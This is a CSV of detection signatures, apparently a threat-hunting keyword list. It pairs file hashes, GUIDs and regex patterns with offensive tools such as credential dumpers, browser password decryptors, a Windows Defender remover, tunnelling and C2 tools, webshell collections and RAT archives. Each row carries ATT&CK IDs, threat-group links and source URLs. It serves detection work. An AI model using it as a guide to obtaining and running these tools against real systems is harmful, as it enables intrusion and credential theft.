"*8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545*",".{0,1000}8eb06c672abfaf7de3d0f8b077737415d22b502f08160180771f8b6aa5f65545.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30925"
"*8ebbf29735fb137a1de8df693e7762685ecf873e5b83fc927cd561e170c275bd*",".{0,1000}8ebbf29735fb137a1de8df693e7762685ecf873e5b83fc927cd561e170c275bd.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","30927"
"*8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b*",".{0,1000}8ebc87ad08296cb20668cd2d4c3a5a5cdd847100f3e5cf559d1b48ebae32959b.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30928"
"*8ec0be6f26497c4abef4cdb6e2eef4aec30f8cb2aacd65f200b7cc6daba26f0c*",".{0,1000}8ec0be6f26497c4abef4cdb6e2eef4aec30f8cb2aacd65f200b7cc6daba26f0c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30929"
"*8ec72b1306f2b9c3b620926db69784d38e8169d3eb58d5db2d670d839e622765*",".{0,1000}8ec72b1306f2b9c3b620926db69784d38e8169d3eb58d5db2d670d839e622765.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","30930"
"*8ecf8d9dc253ab974d080663d0b238fb4e5c178b878fbc6850241bf72ea3dd8b*",".{0,1000}8ecf8d9dc253ab974d080663d0b238fb4e5c178b878fbc6850241bf72ea3dd8b.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","30932"
"*8ed63d8ebff65f45e52363e48a49af26f04ef82e538aa92a589eb1525d1ff6cb*",".{0,1000}8ed63d8ebff65f45e52363e48a49af26f04ef82e538aa92a589eb1525d1ff6cb.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","30933"
"*8ed72e4fc14d2a4bbb9d52d5521ebbe77d2ec46b5469d8e25c5965908686c7b7*",".{0,1000}8ed72e4fc14d2a4bbb9d52d5521ebbe77d2ec46b5469d8e25c5965908686c7b7.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30934"
"*8EE4FF2A394B4683DA7E1BCB76010F184A587BFBF41E2853CE4E007ABDD9B75E*",".{0,1000}8EE4FF2A394B4683DA7E1BCB76010F184A587BFBF41E2853CE4E007ABDD9B75E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30935"
"*8eedb89dca530ace7157ce9e1842cf3cfe4bc61830b4f23e03fb992663f8c05c*",".{0,1000}8eedb89dca530ace7157ce9e1842cf3cfe4bc61830b4f23e03fb992663f8c05c.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30937"
"*8ef32f05998a4cc84237167458d42df34b3dc8534fb823ba909a8b2f76977eb7*",".{0,1000}8ef32f05998a4cc84237167458d42df34b3dc8534fb823ba909a8b2f76977eb7.{0,1000}","offensive_tool_keyword","resocks","resocks is a reverse/back-connect SOCKS5 proxy tunnel that can be used to route traffic through a system that can't be directly accessed","T1090.003 - T1090 - T1571","TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/RedTeamPentesting/resocks","1","0","#filehash","N/A","8","10","437","33","2023-09-19T10:43:29Z","2023-05-02T08:42:15Z","30939"
"*8ef62495d042ae030268ca52d01baece60c79f34d49a113ef5c2322e7041c053*",".{0,1000}8ef62495d042ae030268ca52d01baece60c79f34d49a113ef5c2322e7041c053.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","0","#filehash","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","30940"
"*8ef6d74b5bea0620df5683dff79370b6308fe6bbfaa07cbffee08a26950cffbe*",".{0,1000}8ef6d74b5bea0620df5683dff79370b6308fe6bbfaa07cbffee08a26950cffbe.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30941"
"*8ef7679f55cb6735f37c83c4e5b0dd8d2143c2d279d481bfd4d47bd5be40fb98*",".{0,1000}8ef7679f55cb6735f37c83c4e5b0dd8d2143c2d279d481bfd4d47bd5be40fb98.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30942"
"*8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c*",".{0,1000}8ef891d6334629876c3c94569c9c35acd3b3d2b6930ee1c90086d715e120a40c.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30943"
"*8efa930aaaf5c4db5ff39afaf5a1ef5a396a4257841ccdfcb66f3a2f1637db6d*",".{0,1000}8efa930aaaf5c4db5ff39afaf5a1ef5a396a4257841ccdfcb66f3a2f1637db6d.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","30944"
"*8efacc6011b8491d8d6fbd8d3d1a3d9c7030f9a7a29000eaac922dfba7c5d72d*",".{0,1000}8efacc6011b8491d8d6fbd8d3d1a3d9c7030f9a7a29000eaac922dfba7c5d72d.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30945"
"*8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0*",".{0,1000}8efd5b8fbdba3db4ebd783214b56dae23e329eae2c7b1ce36aa59f0726cd35a0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30946"
"*8f0024607c41631601d00be5be8363412af06193353d0ae20b749f3843da41f0*",".{0,1000}8f0024607c41631601d00be5be8363412af06193353d0ae20b749f3843da41f0.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","30947"
"*8F018213-4136-4D97-9084-F0346BBED04F*",".{0,1000}8F018213\-4136\-4D97\-9084\-F0346BBED04F.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tool","https://github.com/ly4k/PassTheChallenge","1","0","#GUIDproject","N/A","9","4","334","21","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z","30948"
"*8f08c9ab02e3c180eef98a8e28c2f9be584d56dea5fa72dcdf739c5753841022*",".{0,1000}8f08c9ab02e3c180eef98a8e28c2f9be584d56dea5fa72dcdf739c5753841022.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30949"
"*8f0c9eaabea10640a0e534b55d46c1d61aa92bb370d4696fb9e7b3c8bb965d8d*",".{0,1000}8f0c9eaabea10640a0e534b55d46c1d61aa92bb370d4696fb9e7b3c8bb965d8d.{0,1000}","offensive_tool_keyword","Dispossessor","Bruteforce tools used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","30951"
"*8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311*",".{0,1000}8f13ce758ca663d93b81c6db2c658cade683058012e65cbb066a82dac4f58311.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30954"
"*8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132*",".{0,1000}8f1c38bd7991da18509ef47cf01ebb1f1527acce08a9a0b25f46f70486bd5132.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","#filehash","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","30955"
"*8F208DB9-7555-46D5-A5FE-2D7E85E05CAA*",".{0,1000}8F208DB9\-7555\-46D5\-A5FE\-2D7E85E05CAA.{0,1000}","offensive_tool_keyword","PrivFu","enable or disable specific token privileges for a process","T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","SwitchPriv","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","30956"
"*8f23f05d5f97707f4e3e4d90175a099fb924b07c9ed7b81e3a1b8d4bc1c471df*",".{0,1000}8f23f05d5f97707f4e3e4d90175a099fb924b07c9ed7b81e3a1b8d4bc1c471df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30957"
"*8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20*",".{0,1000}8f2a1d66e0a532a030da8e0e646f866ea91ee987ffb33b36d95f64a0538a3e20.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","#filehash","N/A","10","10","1697","228","2024-09-04T17:09:30Z","2020-04-12T17:40:03Z","30959"
"*8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01*",".{0,1000}8f31909ad50984539183ebd099eceed04617e520d44c8ef0081a114aa8d5ed01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30960"
"*8f32c6af660897e07089798972eaba79006a5aeeb7a96327a597d4e47eaa34d9*",".{0,1000}8f32c6af660897e07089798972eaba79006a5aeeb7a96327a597d4e47eaa34d9.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","30961"
"*8f3975294d590878d7c5cfc015c2fa1a0ac7b4d316f5f2e62c42cc1473d1f1be*",".{0,1000}8f3975294d590878d7c5cfc015c2fa1a0ac7b4d316f5f2e62c42cc1473d1f1be.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30962"
"*8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f*",".{0,1000}8f3fc1278c3632af8725bc717de00833c6710b955372756f30b4ed0a6cccdd0f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30963"
"*8f42a2c94a2d7f651e114afca2b89ac93f0a8774f5d9dbb8d15b5a8300120273*",".{0,1000}8f42a2c94a2d7f651e114afca2b89ac93f0a8774f5d9dbb8d15b5a8300120273.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","30964"
"*8f45cb2ad194897123fc4cfac863bc1cb746a35e4f339261b88351d136289181*",".{0,1000}8f45cb2ad194897123fc4cfac863bc1cb746a35e4f339261b88351d136289181.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30965"
"*8f48fc7f2b40dd92fea030c044e9d48035cf6a561b3a09d02c161bacab0f3c30*",".{0,1000}8f48fc7f2b40dd92fea030c044e9d48035cf6a561b3a09d02c161bacab0f3c30.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30967"
"*8f4a61afd9794d6024f42008417a94865d1912b5def2cfe91ea10cb60340cf8e*",".{0,1000}8f4a61afd9794d6024f42008417a94865d1912b5def2cfe91ea10cb60340cf8e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30968"
"*8f60eedf43f6559c83c5debc70d84fbf4f1cc87239acbf304d2f1ac78a09a1e5*",".{0,1000}8f60eedf43f6559c83c5debc70d84fbf4f1cc87239acbf304d2f1ac78a09a1e5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","30969"
"*8F6EB0768AB3620A60AC80E9A1E14F83BD7332E8AFC00092FD4768C8686DA87E*",".{0,1000}8F6EB0768AB3620A60AC80E9A1E14F83BD7332E8AFC00092FD4768C8686DA87E.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","30972"
"*8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299*",".{0,1000}8f6fd0bc95fcbefdfa01a3f7e809914696bc1285a7f7bc39c3bbd1d2314b8299.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30973"
"*8F71C671-F53C-4F4F-98B9-8B8D3263C0DB*",".{0,1000}8F71C671\-F53C\-4F4F\-98B9\-8B8D3263C0DB.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30974"
"*8f71ce37ef8df7223f14a8c3021b94b2b7d3bcd23b813df32497826887e0b14a*",".{0,1000}8f71ce37ef8df7223f14a8c3021b94b2b7d3bcd23b813df32497826887e0b14a.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","30975"
"*8f78ba859a0d8f7a131310f48406af6faf0496871588ffb071bd186cdc8e8e65*",".{0,1000}8f78ba859a0d8f7a131310f48406af6faf0496871588ffb071bd186cdc8e8e65.{0,1000}","offensive_tool_keyword","ShellSync","exposing a server with suspicious scripts and executable from I-Am-Jakoby","T1059.003 - T1100  - T1027","TA0005 - TA0009 - TA0011 ","N/A","N/A","Data Exfiltration","https://github.com/I-Am-Jakoby/ShellSync","1","0","#filehash","N/A","5","1","20","7","2023-11-08T18:01:18Z","2023-11-06T06:05:11Z","30980"
"*8f93c473d769f7d93c9293fefb6c6f4dcca66ecbf9fba6dc968fc2d061696d0b*",".{0,1000}8f93c473d769f7d93c9293fefb6c6f4dcca66ecbf9fba6dc968fc2d061696d0b.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","30984"
"*8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de*",".{0,1000}8f98671d7d96d0e04df6f8510a65f4cdf1fdea2978a0e0a67c998274c40051de.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30985"
"*8f9c15a3849965a7739d98d4769d1a3c2a5943265f6a189ab74ea077620f9cbc*",".{0,1000}8f9c15a3849965a7739d98d4769d1a3c2a5943265f6a189ab74ea077620f9cbc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30986"
